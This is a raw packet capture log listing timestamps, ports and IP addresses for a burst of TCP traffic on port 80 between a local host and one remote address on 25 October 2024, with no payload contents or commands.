Oct 25, 2024 05:21:07.370100975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370112896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370136023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370145082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370168924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370181084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370203018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370215893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370235920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370249987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370271921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370282888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370305061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370341063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370356083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370356083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370373964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370385885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370409966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370430946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370445967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370455027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370481014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370493889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370517969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370534897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370553017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.370558023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.370595932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411096096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411186934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411216021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411279917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411276102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411277056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411277056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411336899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411397934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411397934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411405087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411462069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411472082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411518097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411555052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411632061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411665916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411729097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411746979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411746979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411747932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411796093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411818981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411834002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411839008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411880970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411899090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411947012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.411961079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.411993980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412026882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412075043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412095070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412113905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412113905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412149906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412158012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412208080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412230968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412283897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412288904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412319899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412342072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412354946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412374020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412404060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412415981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412467003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412520885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412573099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412590027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412640095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412642002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412673950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412691116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412725925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412728071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412770987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412779093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412805080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412821054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412851095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412868977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412916899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412930965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412962914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.412981033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.412998915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413005114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413038015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413058043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413080931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413110018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413142920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413157940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413196087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413203955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413266897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413299084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413315058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413333893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413351059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413376093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413382053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413408041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413409948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413427114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413444042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413463116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413479090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413507938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413511992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413527966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413558006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413573980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413608074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413621902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413652897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413667917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413701057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413717985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413734913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413741112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413779020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413781881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413824081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413840055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413873911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413887024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413907051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413916111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413939953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413949013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.413974047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.413986921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414009094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414016962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414041996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414060116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414081097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414084911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414130926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414145947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414189100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414211035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414258003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414272070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414305925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414320946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414340019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414360046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414374113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414381027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414407015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414422035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414441109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414448023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414477110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414485931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414510012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414525032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414542913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414550066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414577007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414589882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414619923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414628029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414664984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414674997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414716005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414729118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414763927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414778948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414793968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414813042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414827108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414833069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414860010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414870977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.414892912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.414906979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415038109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415045977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415095091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415095091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415137053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415148973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415174961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415189981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415225029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415225983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415277004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415290117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415342093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415364981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415378094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415400028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415412903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415426970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415446043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415460110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415479898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415496111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415513039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415553093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415553093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415560007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415606976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415625095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415661097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415679932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415709972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415721893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415755987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415771961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415787935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415796995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415839911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415853977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415904999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415920973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415955067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.415971994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.415987968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416011095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416033983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416055918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416106939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416117907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416217089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416229010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416260958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416285038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416296959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416306019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416330099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416347980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416364908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416385889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416398048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416407108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416431904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416446924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416465998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416476965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416500092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416512012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416533947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416551113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416563988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416588068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416596889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416610003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416631937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416661024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416665077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416687012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416698933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416706085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416732073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416743994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416765928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416788101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416795015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416812897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416827917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416836977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416862011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416881084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416894913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416904926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416930914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416943073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.416965008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.416980028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417005062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417015076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417036057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417057037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417068005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417083979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417102098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417115927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417136908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417151928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417171001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417182922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417203903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417237043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417237043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417259932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417272091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417284966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417305946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417323112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417339087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417352915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417372942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417387009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417407990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417427063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417443037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417453051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417475939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417491913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417510033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417530060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417536974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417553902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417557001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417567968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417582035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417583942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417602062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417608976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417608976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417617083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417633057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417637110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417637110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417649984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417658091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417665958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417681932 CEST	80	49730	185.215.113.37	192.168.2.4
